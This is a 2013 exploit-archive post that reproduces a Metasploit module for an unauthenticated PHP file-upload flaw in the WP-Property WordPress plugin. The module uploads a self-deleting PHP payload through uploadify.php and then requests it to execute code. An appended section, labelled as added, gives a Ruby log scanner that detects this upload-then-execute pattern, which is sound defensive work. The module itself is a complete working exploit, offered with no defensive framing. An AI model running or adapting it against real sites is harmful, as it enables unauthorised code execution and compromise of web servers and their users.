WordPress WP-Property PHP File Upload Vulnerability
Posted on 2013-1-4 19:51:30

```ruby
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'
require 'msf/core/exploit/php_exe'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  def check
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  def exploit
    uri =  target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end
```

Don't ask me what this code is or how to use it. I mean msf.
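
Added example, not part of the original post or of the Metasploit project: a log check for the request pattern the module above produces, a POST to the plugin's `uploadify.php` followed by a request for another script under the same `uploadify/` directory. The combined access-log format, the function and constant names, and every sample line are assumptions constructed for illustration.

```ruby
require 'cgi'

# Added example (not from the post or the Metasploit project): flag the
# upload-then-request pattern in access logs. Combined log format is assumed.
UPLOADIFY_DIR = 'wp-content/plugins/wp-property/third-party/uploadify/'
LOG_RE = /\A(?<ip>\S+) \S+ \S+ \[(?<ts>[^\]]+)\] "(?<method>[A-Z]+) (?<path>\S+) [^"]*" (?<status>\d{3})/
SCRIPT_RE = /\.(?:php\d?|phtml|phar)\z/i

# Constructed sample lines (documentation IP ranges, made-up file name).
SAMPLE_LOG = <<~LOG
  198.51.100.23 - - [04/Jan/2013:19:40:01 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 0
  198.51.100.23 - - [04/Jan/2013:19:40:02 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 200 71
  198.51.100.23 - - [04/Jan/2013:19:40:03 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/kQzRt.php HTTP/1.1" 200 0
  192.0.2.10 - - [04/Jan/2013:19:41:10 +0800] "GET /wordpress/index.php HTTP/1.1" 200 5120
  192.0.2.10 - - [04/Jan/2013:19:41:11 +0800] "GET /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.css HTTP/1.1" 200 812
  203.0.113.9 - - [04/Jan/2013:19:45:00 +0800] "POST /wordpress/wp-content/plugins/wp-property/third-party/uploadify/uploadify.php HTTP/1.1" 404 210
LOG

# Returns one hash per suspicious request, in log order.
def scan_uploadify(log_text)
  findings = []
  upload_seen = false # a POST to uploadify.php has already returned 200
  log_text.each_line do |line|
    m = LOG_RE.match(line)
    next unless m
    # Drop the query string and decode %-escapes before comparing paths.
    path = CGI.unescape(m[:path].split('?', 2).first).scrub
    idx = path.index(UPLOADIFY_DIR)
    next unless idx
    file = path[(idx + UPLOADIFY_DIR.length)..-1]
    hit = { ip: m[:ip], ts: m[:ts], file: file, status: m[:status].to_i }
    if m[:method] == 'POST' && file == 'uploadify.php'
      upload_seen ||= hit[:status] == 200
      findings << hit.merge(type: :upload_attempt)
    elsif file != 'uploadify.php' && file.match?(SCRIPT_RE)
      # Any other script served from the upload directory is unexpected.
      findings << hit.merge(type: :script_in_upload_dir, after_upload: upload_seen)
    end
  end
  findings
end

scan_uploadify(SAMPLE_LOG).each { |f| puts f.inspect } if $PROGRAM_NAME == __FILE__
```

A `script_in_upload_dir` finding with `after_upload: true` and status 200 is the strongest signal. Because the module's payload is generated with `:unlink_self=>true`, the uploaded file may no longer be on disk by the time the logs are reviewed.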